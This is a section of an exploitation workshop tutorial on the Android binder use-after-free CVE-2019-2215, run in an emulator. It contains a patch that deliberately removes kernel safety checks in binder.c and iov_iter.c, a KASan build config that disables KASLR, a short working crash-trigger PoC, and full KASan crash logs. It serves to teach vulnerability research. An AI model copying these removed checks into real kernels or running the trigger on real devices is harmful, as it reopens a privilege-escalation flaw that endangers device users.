Vulnerability Trigger
In Android Kernel Source Code section, we synchronized q-goldfish-android-goldfish-4.14-dev branch. However, CVE-2019-2215 is already patched in q-goldfish-android-goldfish-4.14-dev.
We will reintroduce the vulnerability by applying a custom patch and then build it with Kernel Address Sanitizer (KASan) support.
Reintroduction
You can find the custom patch in the workshop/patch directory which will reintroduce the vulnerability again.
diff --git a/drivers/android/binder.c b/drivers/android/binder.c
index f6ddec245187..55e2748a13e4 100644
--- a/drivers/android/binder.c
+++ b/drivers/android/binder.c
@@ -4768,10 +4768,12 @@ static int binder_thread_release(struct binder_proc *proc,
* waitqueue_active() is safe to use here because we're holding
* the inner lock.
*/
+ /*
if ((thread->looper & BINDER_LOOPER_STATE_POLL) &&
waitqueue_active(&thread->wait)) {
wake_up_poll(&thread->wait, POLLHUP | POLLFREE);
}
+ */
binder_inner_proc_unlock(thread->proc);
@@ -4781,8 +4783,10 @@ static int binder_thread_release(struct binder_proc *proc,
* descriptor being closed); ep_remove_waitqueue() holds an RCU read
* lock, so we can be sure it's done after calling synchronize_rcu().
*/
+ /*
if (thread->looper & BINDER_LOOPER_STATE_POLL)
synchronize_rcu();
+ */
if (send_reply)
binder_send_failed_reply(send_reply, BR_DEAD_REPLY);
diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index 7b2fd5f251f2..67af61637f55 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -132,19 +132,21 @@
static int copyout(void __user *to, const void *from, size_t n)
{
- if (access_ok(VERIFY_WRITE, to, n)) {
+ /*if (access_ok(VERIFY_WRITE, to, n)) {
kasan_check_read(from, n);
n = raw_copy_to_user(to, from, n);
- }
+ }*/
+ n = raw_copy_to_user(to, from, n);
return n;
}
static int copyin(void *to, const void __user *from, size_t n)
{
- if (access_ok(VERIFY_READ, from, n)) {
+ /*if (access_ok(VERIFY_READ, from, n)) {
kasan_check_write(to, n);
n = raw_copy_from_user(to, from, n);
- }
+ }*/
+ n = raw_copy_from_user(to, from, n);
return n;
}
Let's apply the patch and see which files are modified.
ashfaq@hacksys:~/workshop/android-4.14-dev$ cd goldfish/
ashfaq@hacksys:~/workshop/android-4.14-dev/goldfish$ git status
Not currently on any branch.
nothing to commit, working tree clean
ashfaq@hacksys:~/workshop/android-4.14-dev/goldfish$ git apply ~/workshop/patch/cve-2019-2215.patch
ashfaq@hacksys:~/workshop/android-4.14-dev/goldfish$ git status
Not currently on any branch.
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git checkout -- <file>..." to discard changes in working directory)
modified: drivers/android/binder.c
modified: lib/iov_iter.c
no changes added to commit (use "git add" and/or "git commit -a")
Patching drivers/android/binder.c is fine and understandable. But, why we need to patch lib/iov_iter.c?
This is because we are also going to use struct iovec as the corruption target as used by Maddie Stone and Jann Horn of Project Zero. However, they wrote the exploit for Android 4.4 kernel which does not have these additional checks in lib/iov_iter.c.
That's the reason we revert these new checks with a patch. You will have better idea what I'm talking about as we proceed with the workshop.
Build Kernel With KASan
To build the kernel with KASan support we will need a configuration file. You will find the config file in workshop/build-configs/goldfish.x86_64.kasan directory.
ARCH=x86_64
BRANCH=kasan
CC=clang
CLANG_PREBUILT_BIN=prebuilts-master/clang/host/linux-x86/clang-r377782b/bin
BUILDTOOLS_PREBUILT_BIN=build/build-tools/path/linux-x86
CLANG_TRIPLE=x86_64-linux-gnu-
CROSS_COMPILE=x86_64-linux-androidkernel-
LINUX_GCC_CROSS_COMPILE_PREBUILTS_BIN=prebuilts/gcc/linux-x86/x86/x86_64-linux-android-4.9/bin
KERNEL_DIR=goldfish
EXTRA_CMDS=''
STOP_SHIP_TRACEPRINTK=1
FILES="
arch/x86/boot/bzImage
vmlinux
System.map
"
DEFCONFIG=x86_64_ranchu_defconfig
POST_DEFCONFIG_CMDS="check_defconfig && update_kasan_config"
function update_kasan_config() {
${KERNEL_DIR}/scripts/config --file ${OUT_DIR}/.config \
-e CONFIG_KASAN \
-e CONFIG_KASAN_INLINE \
-e CONFIG_TEST_KASAN \
-e CONFIG_KCOV \
-e CONFIG_SLUB \
-e CONFIG_SLUB_DEBUG \
-e CONFIG_SLUB_DEBUG_ON \
-d CONFIG_SLUB_DEBUG_PANIC_ON \
-d CONFIG_KASAN_OUTLINE \
-d CONFIG_KERNEL_LZ4 \
-d CONFIG_RANDOMIZE_BASE
(cd ${OUT_DIR} && \
make O=${OUT_DIR} $archsubarch CROSS_COMPILE=${CROSS_COMPILE} olddefconfig)
}
Now, let's use this config file and start the build process.
ashfaq@hacksys:~/workshop/android-4.14-dev$ BUILD_CONFIG=../build-configs/goldfish.x86_64.kasan build/build.sh
You can find the built kernel and other files in workshop/android-4.14-dev/out/kasan/dist.
ashfaq@hacksys:~/workshop/android-4.14-dev$ nm out/kasan/dist/vmlinux | grep kasan | head
000000004cfd027e A __crc_kasan_check_read
000000009da7c655 A __crc_kasan_check_write
0000000074961168 A __crc_kasan_kmalloc
0000000047f78877 A __crc_kasan_restore_multi_shot
0000000097645739 A __crc_kasan_save_enable_multi_shot
ffffffff806d4d62 T kasan_add_zero_shadow
ffffffff806d3a9c T kasan_alloc_pages
ffffffff806d3b44 T kasan_cache_create
ffffffff806d55b9 T kasan_cache_shrink
ffffffff806d55c4 T kasan_cache_shutdown
Boot Kernel
Let's boot this custom kernel in emulator.
ashfaq@hacksys:~/workshop/android-4.14-dev$ emulator -show-kernel -no-snapshot -wipe-data -avd CVE-2019-2215 -kernel ~/workshop/android-4.14-dev/out/kasan/dist/bzImage
Note:
-show-kernelflag is used to display kernel debug messages in the terminal window. Read more about emulator command line flags here https://developer.android.com/studio/run/emulator-commandline
If you look at kernel log being displayed in the terminal window after running the above command, you will notice this
[ 0.000000] kasan: KernelAddressSanitizer initialized
This is an indicator that we are able to successfully boot a custom kernel built with KASan support.
Crash
Let's grab the PoC from the original bug report and see if we are able to trigger the vulnerability and produce a KASan crash.
You can find the trigger PoC in workshop/exploit/trigger.cpp. I have provided a Makefile that you can use to build the PoC and push it to the virtual device.
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <stdio.h>
#define BINDER_THREAD_EXIT 0x40046208ul
int main() {
int fd, epfd;
struct epoll_event event = {.events = EPOLLIN};
fd = open("/dev/binder", O_RDONLY);
epfd = epoll_create(1000);
epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
ioctl(fd, BINDER_THREAD_EXIT, NULL);
}
ashfaq@hacksys:~/workshop$ cd exploit/
ashfaq@hacksys:~/workshop/exploit$ NDK_ROOT=~/Android/Sdk/ndk/21.0.6113669 make build-trigger push-trigger
Building: cve-2019-2215-trigger
Pushing: cve-2019-2215-trigger to /data/local/tmp
cve-2019-2215-trigger: 1 file pushed, 0 skipped. 44.8 MB/s (3958288 bytes in 0.084s)
ashfaq@hacksys:~/workshop/exploit$ adb shell
generic_x86_64:/ $ uname -a
Linux localhost 4.14.150+ #1 repo:q-goldfish-android-goldfish-4.14-dev SMP PREEMPT Sat Apr x86_64
generic_x86_64:/ $ cd /data/local/tmp
generic_x86_64:/data/local/tmp $ ./cve-2019-2215-trigger
generic_x86_64:/data/local/tmp $
Look at the terminal window from where you launched the emulator, you will see the KASan crash log.
[ 382.398561] ==================================================================
[ 382.402796] BUG: KASAN: use-after-free in _raw_spin_lock_irqsave+0x3a/0x5d
[ 382.405929] Write of size 4 at addr ffff88804e4865c8 by task cve-2019-2215-t/7682
[ 382.409386]
[ 382.410127] CPU: 1 PID: 7682 Comm: cve-2019-2215-t Tainted: G W 4.14.150+ #1
[ 382.413871] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org 04/01/2014
[ 382.417931] Call Trace:
[ 382.419106] dump_stack+0x78/0xbe
[ 382.420596] print_address_description+0x81/0x25d
[ 382.422146] ? _raw_spin_lock_irqsave+0x3a/0x5d
[ 382.423691] __kasan_report+0x14f/0x180
[ 382.425082] ? _raw_spin_lock_irqsave+0x3a/0x5d
[ 382.426437] kasan_report+0x26/0x49
[ 382.427468] check_memory_region+0x171/0x17e
[ 382.428725] kasan_check_write+0x14/0x16
[ 382.429884] _raw_spin_lock_irqsave+0x3a/0x5d
[ 382.431010] remove_wait_queue+0x27/0x122
[ 382.432003] ? fsnotify_unmount_inodes+0x1e8/0x1e8
[ 382.433156] ep_unregister_pollwait+0x160/0x1bd
[ 382.434252] ep_free+0x8b/0x181
[ 382.435024] ? ep_eventpoll_poll+0x228/0x228
[ 382.435953] ep_eventpoll_release+0x48/0x54
[ 382.436825] __fput+0x1f2/0x51d
[ 382.437483] ____fput+0x15/0x18
[ 382.438145] task_work_run+0x127/0x154
[ 382.438932] do_exit+0x818/0x2384
[ 382.439642] ? mm_update_next_owner+0x52f/0x52f
[ 382.440555] do_group_exit+0x12c/0x24b
[ 382.441247] ? do_group_exit+0x24b/0x24b
[ 382.441964] SYSC_exit_group+0x17/0x17
[ 382.442652] SyS_exit_group+0x14/0x14
[ 382.443264] do_syscall_64+0x19e/0x225
[ 382.443920] entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[ 382.444784] RIP: 0033:0x4047d7
[ 382.445341] RSP: 002b:00007ffe9760fe18 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7
[ 382.446661] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00000000004047d7
[ 382.447904] RDX: 0000000000000002 RSI: 0000000000001000 RDI: 0000000000000000
[ 382.449190] RBP: 0000000000000000 R08: 0000000000482335 R09: 0000000000000000
[ 382.450517] R10: 00007ffe9760fe10 R11: 0000000000000246 R12: 0000000000400190
[ 382.451889] R13: 00000000004a4618 R14: 00000000004002e0 R15: 00007ffe9760fee0
[ 382.453146]
[ 382.453427] Allocated by task 7682:
[ 382.454054] save_stack_trace+0x16/0x18
[ 382.454738] __kasan_kmalloc+0x133/0x1cc
[ 382.455445] kasan_kmalloc+0x9/0xb
[ 382.456063] kmem_cache_alloc_trace+0x1bd/0x26f
[ 382.456869] binder_get_thread+0x166/0x6db
[ 382.457605] binder_poll+0x4c/0x1c2
[ 382.458235] SyS_epoll_ctl+0x1558/0x24f0
[ 382.458910] do_syscall_64+0x19e/0x225
[ 382.459598] entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[ 382.460525] 0xffffffffffffffff
[ 382.461085]
[ 382.461334] Freed by task 7682:
[ 382.461762] save_stack_trace+0x16/0x18
[ 382.462222] __kasan_slab_free+0x18f/0x23f
[ 382.462711] kasan_slab_free+0xe/0x10
[ 382.463149] kfree+0x193/0x5b3
[ 382.463538] binder_thread_dec_tmpref+0x192/0x1d9
[ 382.464095] binder_thread_release+0x464/0x4bd
[ 382.464623] binder_ioctl+0x48a/0x101c
[ 382.465071] do_vfs_ioctl+0x608/0x106a
[ 382.465518] SyS_ioctl+0x75/0xa4
[ 382.465906] do_syscall_64+0x19e/0x225
[ 382.466358] entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[ 382.466953] 0xffffffffffffffff
[ 382.467335]
[ 382.467783] The buggy address belongs to the object at ffff88804e486528
[ 382.467783] which belongs to the cache kmalloc-512 of size 512
[ 382.469983] The buggy address is located 160 bytes inside of
[ 382.469983] 512-byte region [ffff88804e486528, ffff88804e486728)
[ 382.472065] The buggy address belongs to the page:
[ 382.472915] page:ffffea0001392100 count:1 mapcount:0 mapping: (null) index:0xffff88804e4872a8 compound_mapcount: 0
[ 382.474871] flags: 0x4000000000010200(slab|head)
[ 382.475744] raw: 4000000000010200 0000000000000000 ffff88804e4872a8 000000010012000e
[ 382.476960] raw: ffffea00015fb220 ffff88805ac01650 ffff88805ac0cf40 0000000000000000
[ 382.478072] page dumped because: kasan: bad access detected
[ 382.478784]
[ 382.478973] Memory state around the buggy address:
[ 382.479571] ffff88804e486480: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 382.480479] ffff88804e486500: fc fc fc fc fc fb fb fb fb fb fb fb fb fb fb fb
[ 382.481318] >ffff88804e486580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 382.482155] ^
[ 382.482806] ffff88804e486600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 382.483648] ffff88804e486680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 382.484485] ==================================================================
Few things to note from the crash log:
- This is a
Use after Freevulnerability - Crashed while writing 4 bytes in the dangling chunk
- The dangling chunk belong to
kmalloc-512cache
KASan Symbolizer
The above crash log is not very intuitive. We can symbolize the stack traces using kasan_symbolize.py.
ashfaq@hacksys:/tmp$ cat report.txt | python kasan_symbolize.py --linux=~/workshop/android-4.14-dev/out/kasan/ --strip=/home/ashfaq/workshop/android-4.14-dev/goldfish/
==================================================================
BUG: KASAN: use-after-free in[< inline >] atomic_cmpxchg include/asm-generic/atomic-instrumented.h:57
BUG: KASAN: use-after-free in[< inline >] queued_spin_lock include/asm-generic/qspinlock.h:87
BUG: KASAN: use-after-free in[< inline >] do_raw_spin_lock_flags include/linux/spinlock.h:173
BUG: KASAN: use-after-free in[< inline >] __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:119
BUG: KASAN: use-after-free in[< none >] _raw_spin_lock_irqsave+0x3a/0x5d kernel/locking/spinlock.c:160
Write of size 4 at addr ffff88804e4865c8 by task cve-2019-2215-t/7682
CPU: 1 PID: 7682 Comm: cve-2019-2215-t Tainted: G W 4.14.150+ #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org 04/01/2014
Call Trace:
[< inline >] __dump_stack lib/dump_stack.c:17
[< none >] dump_stack+0x78/0xbe lib/dump_stack.c:53
[< none >] print_address_description+0x81/0x25d mm/kasan/report.c:187
?[< inline >] atomic_cmpxchg include/asm-generic/atomic-instrumented.h:57
?[< inline >] queued_spin_lock include/asm-generic/qspinlock.h:87
?[< inline >] do_raw_spin_lock_flags include/linux/spinlock.h:173
?[< inline >] __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:119
?[< none >] _raw_spin_lock_irqsave+0x3a/0x5d kernel/locking/spinlock.c:160
[< none >] __kasan_report+0x14f/0x180 mm/kasan/report.c:316
?[< inline >] atomic_cmpxchg include/asm-generic/atomic-instrumented.h:57
?[< inline >] queued_spin_lock include/asm-generic/qspinlock.h:87
?[< inline >] do_raw_spin_lock_flags include/linux/spinlock.h:173
?[< inline >] __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:119
?[< none >] _raw_spin_lock_irqsave+0x3a/0x5d kernel/locking/spinlock.c:160
[< none >] kasan_report+0x26/0x49 mm/kasan/common.c:626
[< inline >] check_memory_region_inline mm/kasan/generic.c:182
[< none >] check_memory_region+0x171/0x17e mm/kasan/generic.c:191
[< none >] kasan_check_write+0x14/0x16 mm/kasan/common.c:106
[< inline >] atomic_cmpxchg include/asm-generic/atomic-instrumented.h:57
[< inline >] queued_spin_lock include/asm-generic/qspinlock.h:87
[< inline >] do_raw_spin_lock_flags include/linux/spinlock.h:173
[< inline >] __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:119
[< none >] _raw_spin_lock_irqsave+0x3a/0x5d kernel/locking/spinlock.c:160
[< none >] remove_wait_queue+0x27/0x122 kernel/sched/wait.c:50
?[< none >] fsnotify_unmount_inodes+0x1e8/0x1e8 fs/notify/fsnotify.c:99
[< inline >] ep_remove_wait_queue fs/eventpoll.c:612
[< none >] ep_unregister_pollwait+0x160/0x1bd fs/eventpoll.c:630
[< none >] ep_free+0x8b/0x181 fs/eventpoll.c:847
?[< none >] ep_eventpoll_poll+0x228/0x228 fs/eventpoll.c:942
[< none >] ep_eventpoll_release+0x48/0x54 fs/eventpoll.c:879
[< none >] __fput+0x1f2/0x51d fs/file_table.c:210
[< none >] ____fput+0x15/0x18 fs/file_table.c:244
[< none >] task_work_run+0x127/0x154 kernel/task_work.c:113
[< inline >] exit_task_work include/linux/task_work.h:22
[< none >] do_exit+0x818/0x2384 kernel/exit.c:875
?[< none >] mm_update_next_owner+0x52f/0x52f kernel/exit.c:468
[< none >] do_group_exit+0x12c/0x24b kernel/exit.c:978
?[< inline >] spin_unlock_irq include/linux/spinlock.h:367
?[< none >] do_group_exit+0x24b/0x24b kernel/exit.c:975
[< none >] SYSC_exit_group+0x17/0x17 kernel/exit.c:989
[< none >] SyS_exit_group+0x14/0x14 kernel/exit.c:987
[< none >] do_syscall_64+0x19e/0x225 arch/x86/entry/common.c:292
[< none >] entry_SYSCALL_64_after_hwframe+0x3d/0xa2 arch/x86/entry/entry_64.S:233
RIP: 0033:0x4047d7
RSP: 002b:00007ffe9760fe18 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00000000004047d7
RDX: 0000000000000002 RSI: 0000000000001000 RDI: 0000000000000000
RBP: 0000000000000000 R08: 0000000000482335 R09: 0000000000000000
R10: 00007ffe9760fe10 R11: 0000000000000246 R12: 0000000000400190
R13: 00000000004a4618 R14: 00000000004002e0 R15: 00007ffe9760fee0
Allocated by task 7682:
[< none >] save_stack_trace+0x16/0x18 arch/x86/kernel/stacktrace.c:59
[< inline >] save_stack mm/kasan/common.c:76
[< inline >] set_track mm/kasan/common.c:85
[< none >] __kasan_kmalloc+0x133/0x1cc mm/kasan/common.c:501
[< none >] kasan_kmalloc+0x9/0xb mm/kasan/common.c:515
[< none >] kmem_cache_alloc_trace+0x1bd/0x26f mm/slub.c:2819
[< inline >] kmalloc include/linux/slab.h:488
[< inline >] kzalloc include/linux/slab.h:661
[< none >] binder_get_thread+0x166/0x6db drivers/android/binder.c:4677
[< none >] binder_poll+0x4c/0x1c2 drivers/android/binder.c:4805
[< inline >] ep_item_poll fs/eventpoll.c:888
[< inline >] ep_insert fs/eventpoll.c:1476
[< inline >] SYSC_epoll_ctl fs/eventpoll.c:2128
[< none >] SyS_epoll_ctl+0x1558/0x24f0 fs/eventpoll.c:2014
[< none >] do_syscall_64+0x19e/0x225 arch/x86/entry/common.c:292
[< none >] entry_SYSCALL_64_after_hwframe+0x3d/0xa2 arch/x86/entry/entry_64.S:233
0xffffffffffffffff
Freed by task 7682:
[< none >] save_stack_trace+0x16/0x18 arch/x86/kernel/stacktrace.c:59
[< inline >] save_stack mm/kasan/common.c:76
[< inline >] set_track mm/kasan/common.c:85
[< none >] __kasan_slab_free+0x18f/0x23f mm/kasan/common.c:463
[< none >] kasan_slab_free+0xe/0x10 mm/kasan/common.c:471
[< inline >] slab_free_hook mm/slub.c:1407
[< inline >] slab_free_freelist_hook mm/slub.c:1458
[< inline >] slab_free mm/slub.c:3039
[< none >] kfree+0x193/0x5b3 mm/slub.c:3976
[< inline >] binder_free_thread drivers/android/binder.c:4705
[< none >] binder_thread_dec_tmpref+0x192/0x1d9 drivers/android/binder.c:2053
[< none >] binder_thread_release+0x464/0x4bd drivers/android/binder.c:4794
[< none >] binder_ioctl+0x48a/0x101c drivers/android/binder.c:5062
[< none >] do_vfs_ioctl+0x608/0x106a fs/ioctl.c:46
[< inline >] SYSC_ioctl fs/ioctl.c:701
[< none >] SyS_ioctl+0x75/0xa4 fs/ioctl.c:692
[< none >] do_syscall_64+0x19e/0x225 arch/x86/entry/common.c:292
[< none >] entry_SYSCALL_64_after_hwframe+0x3d/0xa2 arch/x86/entry/entry_64.S:233
0xffffffffffffffff
The buggy address belongs to the object at ffff88804e486528
which belongs to the cache kmalloc-512 of size 512
The buggy address is located 160 bytes inside of
512-byte region [ffff88804e486528, ffff88804e486728)
The buggy address belongs to the page:
page:ffffea0001392100 count:1 mapcount:0 mapping: (null) index:0xffff88804e4872a8 compound_mapcount: 0
flags: 0x4000000000010200(slab|head)
raw: 4000000000010200 0000000000000000 ffff88804e4872a8 000000010012000e
raw: ffffea00015fb220 ffff88805ac01650 ffff88805ac0cf40 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffff88804e486480: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
ffff88804e486500: fc fc fc fc fc fb fb fb fb fb fb fb fb fb fb fb
>ffff88804e486580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
^
ffff88804e486600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff88804e486680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================
Isn't this more useful than the previous crash log.